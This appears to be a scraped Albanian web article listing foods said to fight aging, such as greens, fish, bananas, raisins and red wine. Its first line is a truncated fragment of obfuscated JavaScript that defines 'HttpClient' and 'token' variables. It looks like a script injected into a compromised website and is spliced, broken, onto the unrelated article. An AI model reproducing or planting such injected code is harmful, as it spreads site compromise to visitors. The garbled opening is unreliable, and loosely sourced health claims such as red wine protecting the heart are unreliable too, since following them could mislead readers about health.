;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ushqimet që ndihmojnë kundër procesit të plakjes

By

Të dukemi të rinj është një nga sfidat më të mëdha me kalimin e kohës.

Shumica e ushqimeve kanë benefite shëndetësore, por ekziston një grup i këtyre ushqimeve të cilët janë të njohur si ushqime kundër plakjes, ushqime të cilat ndihmojnë në luftën e kalimit të viteve dhe rekomandohen për personat nga mosha 30 vjeçare, këto ushqime mbulojnë disa nevoja specifike ushqyese që kanë të bëjnë me vetitë e kundra plakjes.

Zarzavatet e gjelbra
Zarzavatet e gjelbra janë të mbi ngarkuara me antioksidant dhe të cilët ndihmojnë në luftën kundër radikaleve të lira në trupin tuaj që ju bëjnë juve më të plakur se që duhet. Spinaqi dhe lakra jeshile, konkretisht mbrojnë nga efektet negative të rrezeve UV.

Peshku

Peshku është një ushqim i pasur me Omega 3 dhe acide yndyrore, të cilat ndihmojnë në mënyrë të ndjeshme në reduktimin e kolesterolit, si dhe shmang dhimbjet tipike të artritit tek personat e moshuar. Peshku gjithashtu ndihmon në parandalimit të shfaqjes së perdes në sy (katarakta).Studimet  kanë treguar se peshku redukton në mënyrë të konsiderueshme  degjenerimin makular i cili është shkaktari kryesor i humbjes së shikimit tek personat mbi moshën 60 vjeçare.

Bananja

Bananja është e njohur si një frut i pasur me kalium, një mineral i cili ndihmon në rregullimin e natriumit në trupin tonë.Por, benefitet e bananes nuk qëndrojnë tek prania e sasisë së madhe të kaliumit, por edhe në rregullimin e sodiumit , domethënë në konsumimin e kripës, duke e mbajtur nën kontroll presionin e lartë të gjakut i cili është tepër i pranishëm tek personat më të moshuar.

Rrushi i thatë

Një studim britank ka treguar se frutat e thata ndimojnë në humbjen e peshës, për shkak se japin ndjesinë e ngopjes. Personat të cilët konsumojnë 100 gram rrush të thatë në ditë humbasin peshë dhe zvogëlojnë perimetrin e barkut në krahasim me ata të cilët nuk i konsumojnë ato apo i konsumojnë në një sasi më të vogël. Rrushi i thatë është i pasur me fibra, është i shijshëm dhe nuk e rëndon stomakun gjatë tretjes.

Vera e kuqe
Besoni apo jo, një gotë verë e kuqe mbron zemrën tuaj nga sëmundjet. Ka një antioksidant të mrekullueshëm të quajtur resveratrol, i cili ndihmon në parandalimin e mpiksjes së gjakut. /Prive.al

Artikuj të ngjashëm